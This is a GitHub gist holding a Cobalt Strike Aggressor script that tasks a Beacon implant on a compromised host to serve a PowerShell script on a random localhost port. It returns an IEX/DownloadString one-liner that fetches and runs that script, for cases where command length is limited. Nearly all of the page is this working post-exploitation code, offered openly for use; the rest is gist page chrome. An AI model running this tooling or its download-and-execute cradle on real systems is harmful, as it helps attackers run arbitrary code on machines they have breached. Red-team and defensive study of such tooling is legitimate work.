Skip to content

Instantly share code, notes, and snippets.

@rsmudge

rsmudge/oneliner.cna

Created July 7, 2016 21:07
Show Gist options
  • Star 4 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save rsmudge/bc1791df7c4ddadb960510f366cdcba2 to your computer and use it in GitHub Desktop.
Save rsmudge/bc1791df7c4ddadb960510f366cdcba2 to your computer and use it in GitHub Desktop.
Download ZIP
How to host a large script via Beacon and grab it with a one-liner that connects to localhost.
Raw
oneliner.cna
# host a PowerShell script on a one-off web server via Beacon.
#
# Why? Generate one-liners for length constrained command execution opportunities
#
# NOTE: this uses internal APIs and is subject to break in the next release. Don't hate!
# if there's interest in this capability, I can build an official API for it.
import common.*;
import beacon.*;
# Arguments: beacon id, [code to host]
# Returns: a powershell one-liner to download/evaluate that code...
sub bhost_script {
local('$port $builder');
$port = [CommonUtils randomPort];
# build up our command to send to Beacon
$builder = [new CommandBuilder];
[$builder setCommand: 0x3b];
[$builder addShort: $port];
[$builder addString: $2];
# task Beacon to run the above command.
call("beacons.task", $null, $1, cast([$builder build], 'b'));
# build and return our PowerShell one-liner
return "IEX ((new-object net.webclient).downloadstring('http://127.0.0.1: $+ $port $+ /'))";
}
# demonstrate how to use the above
# oneliner [/path/to/file.ps1]
alias oneliner {
local('$handle $data $oneliner');
# read in the script
$handle = openf($2);
$data = readb($handle, -1);
closef($handle);
# task Beacon to host the script, grab the one-liner
$oneliner = bhost_script($1, $data);
# present it to the user
blog($1, "Here's a one-liner: $oneliner");
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment